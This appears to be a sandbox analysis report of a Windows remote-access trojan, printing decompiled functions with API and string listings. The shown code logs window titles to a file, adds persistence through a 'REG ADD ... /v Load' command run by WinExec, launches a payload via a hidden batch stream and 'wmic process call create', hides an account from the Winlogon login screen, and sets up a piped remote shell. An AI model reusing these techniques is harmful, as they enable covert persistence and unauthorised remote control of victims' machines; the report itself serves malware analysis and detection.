                                  0x004085e9
                                  0x004085f1
                                  0x00408607
                                  0x0040860d
                                  0x0040860f
                                  0x0040865a
                                  0x00408611
                                  0x0040861b
                                  0x00408634
                                  0x00408640
                                  0x00408648
                                  0x0040864d
                                  0x0040864d
                                  0x0040865f
                                  0x00408670
                                  0x00408674
                                  0x00408679
                                  0x004086b4
                                  0x004086b7
                                  0x004086b7
                                  0x004086bd
                                  0x004086c3
                                  0x004086c8
                                  0x0040867b
                                  0x0040868d
                                  0x00408697
                                  0x0040869c
                                  0x004086a1
                                  0x004086a6
                                  0x00000000
                                  0x004086a8
                                  0x004086a8
                                  0x004086a8
                                  0x004086a6
                                  0x004086de
                                  0x004086e4
                                  0x004086f6
                                  0x004086f9
                                  0x004086fd
                                  0x00408700
                                  0x00408707
                                  0x0040870a
                                  0x00408713
                                  0x00408715
                                  0x00408726
                                  0x0040872e
                                  0x00408737
                                  0x00408739
                                  0x0040873e
                                  0x0040874a
                                  0x0040874d
                                  0x00408756
                                  0x00408758
                                  0x00408758
                                  0x0040875e
                                  0x00408761
                                  0x00408768
                                  0x0040876d
                                  0x00408776
                                  0x00408778
                                  0x00408780
                                  0x00408792

                                  APIs
                                  • GetForegroundWindow.USER32 ref: 004085F4
                                  • GetWindowTextW.USER32 ref: 00408607
                                  • lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408670
                                  • lstrcpyW.KERNEL32(-00000210,?), ref: 004086BD
                                  • CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 004086DE
                                  • lstrlenW.KERNEL32(00417A60,00000008,00000000,?,?), ref: 00408707
                                  • WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408713
                                  • WriteFile.KERNEL32(?,?,00000000,-00000008,00000000), ref: 00408737
                                  • lstrlenW.KERNEL32(00417A60,-00000008,00000000,?,?), ref: 0040874A
                                  • WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408756
                                  • lstrlenW.KERNEL32(?,00000008,00000000,?,?), ref: 00408768
                                  • WriteFile.KERNEL32(?,?,00000000,?,?), ref: 00408776
                                  • CloseHandle.KERNEL32(?), ref: 00408780
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$File$Write$Windowlstrcpy$CloseCreateForegroundFreeHandleTextVirtuallstrcat
                                  • String ID: {Unknown}
                                  • API String ID: 2314120260-4054869793
                                  • Opcode ID: 7c00ab8ebeb36043a8b51ae596ee7ad1a8c4eacac02618ea8ae42d8705234516
                                  • Instruction ID: 21f225d70ee6afc1dcb4dd19440159f35fb949404d55de6ac3cc6466c0fc773e
                                  • Opcode Fuzzy Hash: 7c00ab8ebeb36043a8b51ae596ee7ad1a8c4eacac02618ea8ae42d8705234516
                                  • Instruction Fuzzy Hash: EF515F71A40208AFC710EB55DC89FDE7BB9EF44348F0580BAB905A72A1DB759E41CB5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004126DC, Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 296fileprocessCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E004126DC(intOrPtr* __ecx, void* __eflags, WCHAR* _a4, char* _a8, void* _a12) {
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				intOrPtr* _v24;
				WCHAR* _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				void* _t90;
				intOrPtr* _t112;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr* _t145;
				intOrPtr* _t147;
				int _t152;
				int _t179;
				char* _t185;
				WCHAR* _t192;
				intOrPtr _t228;
				intOrPtr* _t254;
				CHAR* _t255;
				void* _t261;
				WCHAR* _t263;
				WCHAR** _t264;
				char** _t265;
				void* _t268;

				_t268 = __eflags;
				_t254 = __ecx;
				_v24 = __ecx;
				E004109A0();
				_t250 = 0xa;
				_t185 =  &_v44;
				E004035B9(_t185, _t250, _t268);
				_push(_t185);
				_push(_t185);
				_t90 = E00412514(__ecx, _t185, __ecx + 0x10);
				E00412554(__ecx);
				_t179 = 0;
				if(_t90 == 0) {
					L4:
					_t259 = _t254 + 0x10;
					goto L5;
				} else {
					_t270 = _a4;
					if(_a4 == 0) {
						goto L4;
					} else {
						_t250 =  *((intOrPtr*)(__ecx + 0xc));
						_t264 = __ecx + 0x20;
						E00403549(_t264, E00410C8A( &_v28,  *((intOrPtr*)(__ecx + 0xc)), _t270));
						E00410C3E(E00405FEB(_v28), _t264);
						E0040373F( &_v16, _t254 + 0x4c);
						E00403447(E0040357C(_t264, _t250, _t270, "\\"), _t270,  &_v16);
						_t243 = _v16;
						E00405FEB(_v16);
						if(CopyFileW(_v20,  *_t264, 0) != 0) {
							E00403333(_t264, _t250, _t265);
							E00405A61(_t254 + 0x30, _t250, _t265);
							E004061F0( &_v40, _t250, _t264, _t264, _t243, _t243);
							_t265 =  &(_t265[4]);
							_t259 = _t254 + 0x10;
							E00412612(_t254, 0x80000001, _t254 + 0x10, 0xf003f, 0);
							E004125DF(_t254, _t254 + 0x18,  &_v40, 3);
							E00403148( &_v40);
							L5:
							if( *_t254 == _t179) {
								E00412612(_t254, 0x80000001, _t259, 0xf003f, _t179);
							}
							_t273 = _a12 - _t179;
							if(_a12 == _t179) {
								L11:
								__eflags = _a8;
								if(__eflags != 0) {
									__eflags = _a4;
									_t260 = _t254 + 0x20;
									_a12 = _t254 + 0x20;
									if(_a4 == 0) {
										E00403549(_t260,  &_v20);
									}
									E00403666(_t260,  &_a4);
									E00405FEB(_a4);
									_t255 = E00401085(0x200);
									E0040102C(_t255, "cmd.exe /c REG ADD \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /f /v Load /t REG_SZ /d \"", 0x68);
									_t261 = E00401133( *((intOrPtr*)(E00403666(_t260,  &_a4))));
									E00405FEB(_a4);
									_t112 = E00403666(_a12,  &_a4);
									_t74 =  &(_t255[0x68]); // 0x68
									E0040102C(_t74,  *_t112, _t261);
									E00405FEB(_a4);
									_t76 =  &(_t255[0x68]); // 0x68
									__eflags =  &(_t76[_t261]);
									E0040102C( &(_t76[_t261]), "\"", 2);
									WinExec(_t255, _t179);
								}
								E004036F7( &_a4,  *((intOrPtr*)(_v24 + 0x20)));
								E00403447( &_a4, __eflags, E004036F7( &_a12, L":Zone.Identifier"));
								E00405FEB(_a12);
								DeleteFileW(_a4);
								_t192 = _a4;
								_t179 = 1;
								__eflags = 1;
							} else {
								__imp__SHGetKnownFolderPath(_t179, _t179,  &_v32);
								E004036F7( &_v16, _v32);
								E0040357C( &_v16, _t250, _t273, L"\\programs.bat");
								E004036F7( &_v12, L"for /F \"usebackq tokens=*\" %%A in (\"");
								E0040357C(E0040357C(E0040357C( &_v12, _t250, _t273, _v16), _t250, _t273, L":start"), _t250, _t273, L"\") do %%A");
								_t130 = E00403666( &_v12,  &_v36);
								_t132 = E00403666( &_v16,  &_v28);
								E004133B6( *_t132,  *_t130, E00403373( &_v12));
								E00405FEB(_v28);
								E00405FEB(_v36);
								E00410C8A( &_v28,  *((intOrPtr*)(_v24 + 0xc)), _t273);
								 *_t265 = L":ApplicationData";
								E0040357C( &_v28,  *((intOrPtr*)(_v24 + 0xc)), _t273,  &E00417570);
								E004036F7( &_a12, L"wmic process call create \'\"");
								_t263 = _v28;
								E0040357C(E0040357C( &_a12,  *((intOrPtr*)(_v24 + 0xc)), _t273, _t263),  *((intOrPtr*)(_v24 + 0xc)), _t273, L"\"\'");
								E0040357C( &_v16,  *((intOrPtr*)(_v24 + 0xc)), _t273, L":start");
								_t145 = E00403666( &_a12,  &_v28);
								_t147 = E00403666( &_v16,  &_v36);
								E004133B6( *_t147,  *_t145, E00403373( &_a12));
								E00405FEB(_v36);
								E00405FEB(_v28);
								_t179 = 0;
								_t152 = CopyFileW(_v20, _t263, 0);
								_t228 = _a12;
								if(_t152 != 0) {
									E00405FEB(_t228);
									_a12 = 0;
									E00405FEB(_t263);
									E00405FEB(_v12);
									_v12 = 0;
									E00405FEB(_v16);
									_t254 = _v24;
									goto L11;
								} else {
									E00405FEB(_t228);
									_a12 = 0;
									E00405FEB(_t263);
									E00405FEB(_v12);
									_t192 = _v16;
									_v12 = 0;
								}
							}
							E00405FEB(_t192);
						}
					}
				}
				E00405FEB(_v44);
				E00405FEB(_v20);
				return _t179;
			}






























                                  0x004126dc
                                  0x004126e5
                                  0x004126ea
                                  0x004126ed
                                  0x004126f4
                                  0x004126f5
                                  0x004126f8
                                  0x004126fd
                                  0x004126fe
                                  0x00412706
                                  0x0041270f
                                  0x00412714
                                  0x00412718
                                  0x004127dc
                                  0x004127dc
                                  0x00000000
                                  0x0041271e
                                  0x0041271e
                                  0x00412721
                                  0x00000000
                                  0x00412727
                                  0x00412727
                                  0x0041272d
                                  0x00412738
                                  0x00412747
                                  0x00412753
                                  0x0041276a
                                  0x0041276f
                                  0x00412772
                                  0x00412785
                                  0x00412790
                                  0x0041279b
                                  0x004127a3
                                  0x004127a8
                                  0x004127ab
                                  0x004127bc
                                  0x004127cd
                                  0x004127d5
                                  0x004127df
                                  0x004127e1
                                  0x004127f1
                                  0x004127f1
                                  0x004127f6
                                  0x004127f9
                                  0x0041297c
                                  0x0041297c
                                  0x00412980
                                  0x00412986
                                  0x0041298a
                                  0x0041298d
                                  0x00412990
                                  0x00412998
                                  0x00412998
                                  0x004129a3
                                  0x004129ab
                                  0x004129bc
                                  0x004129c4
                                  0x004129e2
                                  0x004129e4
                                  0x004129f0
                                  0x004129f8
                                  0x004129fc
                                  0x00412a04
                                  0x00412a0b
                                  0x00412a0e
                                  0x00412a16
                                  0x00412a20
                                  0x00412a20
                                  0x00412a2f
                                  0x00412a45
                                  0x00412a4d
                                  0x00412a55
                                  0x00412a5b
                                  0x00412a60
                                  0x00412a60
                                  0x004127ff
                                  0x0041280a
                                  0x00412816
                                  0x00412823
                                  0x00412830
                                  0x00412854
                                  0x00412860
                                  0x0041286e
                                  0x00412882
                                  0x0041288a
                                  0x00412892
                                  0x004128a0
                                  0x004128a8
                                  0x004128af
                                  0x004128bc
                                  0x004128c1
                                  0x004128d4
                                  0x004128dd
                                  0x004128e9
                                  0x004128f7
                                  0x0041290b
                                  0x00412914
                                  0x0041291c
                                  0x00412921
                                  0x00412928
                                  0x0041292e
                                  0x00412933
                                  0x00412957
                                  0x0041295e
                                  0x00412961
                                  0x00412969
                                  0x00412971
                                  0x00412974
                                  0x00412979
                                  0x00000000
                                  0x00412935
                                  0x00412935
                                  0x0041293c
                                  0x0041293f
                                  0x00412947
                                  0x0041294c
                                  0x0041294f
                                  0x0041294f
                                  0x00412933
                                  0x00412a61
                                  0x00412a61
                                  0x00412785
                                  0x00412721
                                  0x00412a69
                                  0x00412a71
                                  0x00412a7c

                                  APIs
                                    • Part of subcall function 004109A0: GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,?VA,?,00412BF1,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,InitWindows), ref: 004109C1
                                    • Part of subcall function 00412514: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,74A313FB,?,?,0041270B,?,?), ref: 00412534
                                    • Part of subcall function 00412554: RegCloseKey.ADVAPI32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0041277D
                                    • Part of subcall function 00412612: RegCreateKeyExW.ADVAPI32(74A313FB,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?VA,?,00412B64,80000001,?), ref: 00412646
                                    • Part of subcall function 00412612: RegOpenKeyExW.ADVAPI32(74A313FB,00000000,00000000,?,?,?,?,?VA,?,00412B64,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 00412661
                                    • Part of subcall function 004125DF: RegSetValueExW.ADVAPI32(?,000F003F,00000000,80000001,?,?,?,?,004127D2,?,?,00000003,80000001,?,000F003F,00000000), ref: 004125FE
                                  • SHGetKnownFolderPath.SHELL32(00417570,00000000,00000000,?), ref: 0041280A
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 00412928
                                    • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00410CBB
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00410C3E: SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 00410C44
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                  • WinExec.KERNEL32 ref: 00412A20
                                  • DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,00000000,74A313FB,00000000), ref: 00412A55
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$Create$CopyFolderPathlstrcpy$CloseDeleteDirectoryExecFreeKnownModuleNameOpenSpecialValueVirtuallstrcat
                                  • String ID: ") do %%A$:ApplicationData$:Zone.Identifier$:start$\programs.bat$cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "$for /F "usebackq tokens=*" %%A in ("$wmic process call create '"
                                  • API String ID: 1503101065-3574166584
                                  • Opcode ID: 03330eeec4e78cbb5b4aac335cdce81a29988cf68eee8f76144b90fca8fe9da0
                                  • Instruction ID: 79257a46d42963d1d04969a5855fdaa00e68833498fbabbc424ca4f910327048
                                  • Opcode Fuzzy Hash: 03330eeec4e78cbb5b4aac335cdce81a29988cf68eee8f76144b90fca8fe9da0
                                  • Instruction Fuzzy Hash: 1FA12F71A0050AABCB14EF61CC92DEE7B79EF44348B00442EF502772D2DF78AA55CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E29A, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 237registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040E29A(void* __edx, char _a4, char _a8) {
				void* _v12;
				char _v16;
				int _v20;
				char _v36;
				void _v44;
				void* _t51;
				int _t56;
				int _t70;
				void* _t104;
				signed int _t115;
				void* _t161;
				void* _t162;
				void* _t163;
				int _t172;

				_t161 = __edx;
				InitializeCriticalSection( &_v44);
				_t115 = 6;
				DeleteCriticalSection(memcpy(0x55ad18,  &_v44, _t115 << 2));
				EnterCriticalSection(0x55ad18);
				_t167 = _a4;
				_t111 = _a8;
				 *0x55ad7c = _a4;
				 *0x55ad70 = 0x559cc0;
				 *0x55ad6c = _a8;
				if(E0040DCBF(_t161) == 0) {
					_t51 = E00410A3C();
					__eflags = _t51 - 6;
					if(_t51 < 6) {
						L14:
						E00405044(_t167, E00404C5E( &_v36, 2, 0x55ad74, 0x55ad78));
						E00404C3B( &_v36);
						LeaveCriticalSection(0x55ad18);
						__eflags = 0;
						return 0;
					}
					_t56 = E004109ED();
					__eflags = _t56;
					if(_t56 != 0) {
						goto L14;
					}
					__eflags = E0041111B() - 1;
					if(__eflags == 0) {
						_t162 = 8;
						E00403549(0x55ad74, E004035B9( &_a4, _t162, __eflags));
						E00405FEB(_a4);
						_t163 = 8;
						E00403549(0x55ad78, E004035B9( &_a4, _t163, __eflags));
						E00405FEB(_a4);
						_t172 = 0;
						RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", 0, 0, 0, 0xf013f, 0,  &_v12,  &_v20);
						_v16 = 0;
						RegSetValueExW(_v12,  *0x55ad74, 0, 4,  &_v16, 4);
						RegCloseKey(_v12);
						_t70 = E0040D2B8(0x55ad74, 0x55ad78);
						__eflags = _t70;
						if(_t70 != 0) {
							E00412C34(_a8, _t163, E004036F7( &_a4, L"rudp"), 0x55ad74);
							E00405FEB(_a4);
							E00412C34(_a8, _t163, E004036F7( &_a8, L"rpdp"), 0x55ad78);
							E00405FEB(_a8);
							E00401F6D(0x55ad30, E0040E187, 0x55ad18);
							LeaveCriticalSection(0x55ad18);
							return 1;
						}
						E00405044(_t167, E00404C5E( &_v36, 9, 0x55ad74, 0x55ad78));
						E00404C3B( &_v36);
						L12:
						LeaveCriticalSection(0x55ad18);
						return _t172;
					}
					E00405044(_t167, E00404C5E( &_v36, 1, 0x55ad74, 0x55ad78));
					E00404C3B( &_v36);
					_t172 = 0;
					goto L12;
				}
				E00403549(0x55ad74, E00412C67(_t111, _t161,  &_a8, E004036F7( &_a4, L"rudp")));
				E00405FEB(_a8);
				_a8 = 0;
				E00405FEB(_a4);
				E00403549(0x55ad78, E00412C67(_t111, _t161,  &_a8, E004036F7( &_a4, L"rpdp")));
				E00405FEB(_a8);
				_a8 = 0;
				E00405FEB(_a4);
				if(E00403373(0x55ad74) != 0 || E00403373(0x55ad78) != 0) {
					E00405044(_t167, E00404C5E( &_v36, 8, 0x55ad74, 0x55ad78));
					E00404C3B( &_v36);
				} else {
					_t104 = E004036F7( &_a4, 0x417668);
					E00405044(_t167, E00404C5E( &_v36, 8, E004036F7( &_a8, 0x417668), _t104));
					E00404C3B( &_v36);
					E00405FEB(_a8);
					_a8 = 0;
					E00405FEB(_a4);
				}
				_t172 = 1;
				goto L12;
			}

















                                  0x0040e29a
                                  0x0040e2a7
                                  0x0040e2af
                                  0x0040e2be
                                  0x0040e2ca
                                  0x0040e2d0
                                  0x0040e2d3
                                  0x0040e2d6
                                  0x0040e2dc
                                  0x0040e2e6
                                  0x0040e2f3
                                  0x0040e3f4
                                  0x0040e3f9
                                  0x0040e3fc
                                  0x0040e56f
                                  0x0040e586
                                  0x0040e58e
                                  0x0040e594
                                  0x0040e59a
                                  0x00000000
                                  0x0040e59a
                                  0x0040e402
                                  0x0040e407
                                  0x0040e409
                                  0x00000000
                                  0x00000000
                                  0x0040e414
                                  0x0040e417
                                  0x0040e446
                                  0x0040e455
                                  0x0040e45d
                                  0x0040e464
                                  0x0040e475
                                  0x0040e47d
                                  0x0040e485
                                  0x0040e49f
                                  0x0040e4aa
                                  0x0040e4ba
                                  0x0040e4c3
                                  0x0040e4cf
                                  0x0040e4d4
                                  0x0040e4d6
                                  0x0040e523
                                  0x0040e52b
                                  0x0040e541
                                  0x0040e549
                                  0x0040e55e
                                  0x0040e564
                                  0x00000000
                                  0x0040e56c
                                  0x0040e4eb
                                  0x0040e4f3
                                  0x0040e4f8
                                  0x0040e4fe
                                  0x00000000
                                  0x0040e504
                                  0x0040e430
                                  0x0040e438
                                  0x0040e43d
                                  0x00000000
                                  0x0040e43d
                                  0x0040e318
                                  0x0040e320
                                  0x0040e32a
                                  0x0040e32d
                                  0x0040e353
                                  0x0040e35b
                                  0x0040e363
                                  0x0040e366
                                  0x0040e377
                                  0x0040e3df
                                  0x0040e3e7
                                  0x0040e384
                                  0x0040e38d
                                  0x0040e3aa
                                  0x0040e3b2
                                  0x0040e3ba
                                  0x0040e3c2
                                  0x0040e3c5
                                  0x0040e3c5
                                  0x0040e3ee
                                  0x00000000

                                  APIs
                                  • InitializeCriticalSection.KERNEL32(?,?,?), ref: 0040E2A7
                                  • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0040E2BE
                                  • EnterCriticalSection.KERNEL32(0055AD18,?,?), ref: 0040E2CA
                                    • Part of subcall function 0040DCBF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,0055AD18,?,?,0040E2F1,?,?), ref: 0040DCF1
                                  • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?,00000000,00000000,?,?), ref: 0040E49F
                                  • RegSetValueExW.ADVAPI32(?,00000000,00000004,?,00000004,?,?), ref: 0040E4BA
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 0040E4C3
                                  • LeaveCriticalSection.KERNEL32(0055AD18,00000000,0055AD74,0055AD78,?,?), ref: 0040E4FE
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00403373: lstrlenW.KERNEL32(74A313FB,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 0040337A
                                  • LeaveCriticalSection.KERNEL32(0055AD18,00000000,rpdp,0055AD78,00000000,rudp,0055AD74,0055AD74,0055AD78,?,?), ref: 0040E564
                                  • LeaveCriticalSection.KERNEL32(0055AD18,00000000,?,?), ref: 0040E594
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$Leavelstrlen$lstrcpy$CloseCreateDeleteEnterFreeInitializeOpenValueVirtual
                                  • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rudp
                                  • API String ID: 2046459734-177601018
                                  • Opcode ID: b43227a7f7030143bd91accb94493ef4bfc23c2ace7a9839163bc3e6c6cbbbe9
                                  • Instruction ID: 0a479e188c8e80083ad3493b7ec29c52a1503be388f48136fafe1c7c6f2d3922
                                  • Opcode Fuzzy Hash: b43227a7f7030143bd91accb94493ef4bfc23c2ace7a9839163bc3e6c6cbbbe9
                                  • Instruction Fuzzy Hash: 1B7192706005187ACB05BB62CC62EEE7B78EF4431AB00453FB906B62D2DB3C5A45CA99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041001A, Relevance: 19.6, APIs: 13, Instructions: 135pipethreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041001A(void* __eflags, char _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				struct _SECURITY_ATTRIBUTES _v36;
				void* _t54;
				void* _t61;
				void* _t64;
				int _t66;
				void* _t76;
				int _t94;
				void* _t95;

				E0040FFA8(0x426608);
				_v12 = _v12 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t94 = 1;
				_v20 = _v20 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36.lpSecurityDescriptor = _v36.lpSecurityDescriptor & 0x00000000;
				_v36.nLength = 0xc;
				_v36.bInheritHandle = 1;
				if(CreatePipe( &_v12,  &_v8,  &_v36, 0) == 0) {
					L7:
					E004101AB( &_v12);
					E004101AB( &_v8);
					E004101AB( &_v16);
					E004101AB( &_v20);
					E004101AB( &_v24);
					E0040FFA8(0x426608);
					_t94 = 0;
				} else {
					_t54 = GetCurrentProcess();
					if(DuplicateHandle(GetCurrentProcess(), _v8, _t54,  &_v16, 0, 1, 2) == 0 || CreatePipe( &_v24,  &_v20,  &_v36, 0) == 0) {
						goto L7;
					} else {
						_t61 = GetCurrentProcess();
						if(DuplicateHandle(GetCurrentProcess(), _v12, _t61, 0x426610, 0, 0, 2) == 0) {
							goto L7;
						} else {
							_t64 = GetCurrentProcess();
							_t66 = DuplicateHandle(GetCurrentProcess(), _v20, _t64, 0x426614, 0, 0, 2);
							_t101 = _t66;
							if(_t66 == 0) {
								goto L7;
							} else {
								E004101AB( &_v12);
								E004101AB( &_v20);
								E0040373F(_t95,  &_a4);
								if(E0040FDB0(_t95, _t101,  &_v20, _v8, _v24, _v16) == 0) {
									goto L7;
								} else {
									E004101AB( &_v8);
									E004101AB( &_v24);
									E004101AB( &_v16);
									 *0x426618 = CreateEventA(0, 1, 0, 0);
									_t76 = CreateThread(0, 0, E0040FE49, 0x426608, 0, 0x426620);
									 *0x42661c = _t76;
									if(_t76 == 0) {
										goto L7;
									}
								}
							}
						}
					}
				}
				E00405FEB(_a4);
				return _t94;
			}
















                                  0x00410028
                                  0x0041002d
                                  0x00410034
                                  0x0041003a
                                  0x0041003e
                                  0x0041003f
                                  0x00410043
                                  0x00410047
                                  0x00410051
                                  0x0041005c
                                  0x00410068
                                  0x00410166
                                  0x00410169
                                  0x00410171
                                  0x00410179
                                  0x00410181
                                  0x00410189
                                  0x00410193
                                  0x00410198
                                  0x0041006e
                                  0x0041007d
                                  0x00410090
                                  0x00000000
                                  0x004100b2
                                  0x004100bd
                                  0x004100ca
                                  0x00000000
                                  0x004100d0
                                  0x004100db
                                  0x004100e4
                                  0x004100e6
                                  0x004100e8
                                  0x00000000
                                  0x004100ea
                                  0x004100ed
                                  0x004100f5
                                  0x0041010a
                                  0x00410116
                                  0x00000000
                                  0x00410118
                                  0x0041011b
                                  0x00410123
                                  0x0041012b
                                  0x00410152
                                  0x00410157
                                  0x0041015d
                                  0x00410164
                                  0x00000000
                                  0x00000000
                                  0x00410164
                                  0x00410116
                                  0x004100e8
                                  0x004100ca
                                  0x00410090
                                  0x0041019d
                                  0x004101a8

                                  APIs
                                    • Part of subcall function 0040FFA8: GetCurrentThreadId.KERNEL32(?,00000000,00402BC7,00000000,exit,00000000,start), ref: 0040FFB4
                                    • Part of subcall function 0040FFA8: SetEvent.KERNEL32(00000000), ref: 0040FFC8
                                    • Part of subcall function 0040FFA8: WaitForSingleObject.KERNEL32(0042661C,00001388), ref: 0040FFD5
                                    • Part of subcall function 0040FFA8: TerminateThread.KERNEL32(0042661C,000000FE), ref: 0040FFE6
                                  • CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 00410060
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 0041007D
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 00410083
                                  • DuplicateHandle.KERNEL32 ref: 0041008C
                                  • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 004100A4
                                  • GetCurrentProcess.KERNEL32(00426610,00000000,00000000,00000002,?,00000000), ref: 004100BD
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 004100C3
                                  • DuplicateHandle.KERNEL32 ref: 004100C6
                                  • GetCurrentProcess.KERNEL32(00426614,00000000,00000000,00000002,?,00000000), ref: 004100DB
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 004100E1
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00410137
                                  • CreateThread.KERNEL32(00000000,00000000,0040FE49,00426608,00000000,00426620), ref: 00410157
                                  • DuplicateHandle.KERNEL32 ref: 004100E4
                                    • Part of subcall function 004101AB: CloseHandle.KERNEL32(00426618), ref: 004101B5
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 0040FDB0: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,00000000), ref: 0040FE02
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
                                  • String ID:
                                  • API String ID: 337272696-0
                                  • Opcode ID: bee2204493a4bc53444b4e07c688032234b56349314ca8f43c08d651a0757c88
                                  • Instruction ID: 45800abd4bc58874337c2637046ca9fcf03b4e80ac058ab55fe317e8ad8503fa
                                  • Opcode Fuzzy Hash: bee2204493a4bc53444b4e07c688032234b56349314ca8f43c08d651a0757c88
                                  • Instruction Fuzzy Hash: B4416571A40259BBEF10EBA1DC46FEF7B78AF04704F50457AB101B21D1DBBD9A84CA68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D42D, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 71serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040D42D(struct _QUERY_SERVICE_CONFIG* _a4) {
				int _v8;
				void* __ecx;
				void* _t10;
				void* _t26;
				struct _QUERY_SERVICE_CONFIG* _t34;
				void* _t37;

				_v8 = 0;
